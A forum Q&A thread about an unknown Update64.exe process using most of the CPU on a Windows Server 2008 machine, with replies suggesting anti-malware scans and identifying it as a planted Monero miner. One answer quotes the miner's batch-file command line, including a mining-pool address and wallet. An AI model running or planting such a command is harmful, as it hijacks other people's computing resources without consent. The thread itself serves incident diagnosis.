# Update64.exe Using All CPU Resources

Tags: windows-server-2008, windows-server-2008-r2, cpu-usage, anti-virus, malware

I have tried finding out what Update64.exe really does. I think it might be a virus but there's not much out there on the topic. Does anyone know how to fix this? It's using pretty much 80-100% of CPU.

I have tried running the Microsoft Malicious Software Removal Tool. It didn't find anything. Might try Security Essentials next. But, I figured I would ask here just in case any of you guys ran into this issue before. Your positive input is highly appreciated.

Comment: The Microsoft Malicious Software Removal Tool isn't a full featured, comprehensive anti-malware tool. It only looks for a specific and limited number of malicious programs. You need to scan this machine with a proper anti-malware tool.

Comment: Upload the suspicious file to https://www.virustotal.com/ and scan it with multiple virus scanners at once.

Comment: This sounds like ransomware in the process of encrypting your data. If it's not too late, pull power now and put the disk in a different computer to save what data you can. Under no circumstances should you pay the ransom. That helps fund further attacks, and makes you complicit in them.

Answer (score 0):

We had a similar issue two days ago.  We had a `c:\windows\dell` folder that contained the `update64.exe`.   In that folder was also a couple batch files.  One of which had this line:

```
Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1
```

A few Google searches led us to this site as the source: httpX://monero.crypto-pool.fr/

This was a production server, so we tried for a bit, but ended up restoring from backup.

Answer (score -1):

I used Malwarebyte to scan and remove update64.exe Also deleted c:\windows\dell folder which had other viruses in it.

Comment: This fails to answer the OPs question of what `update64.exe` is.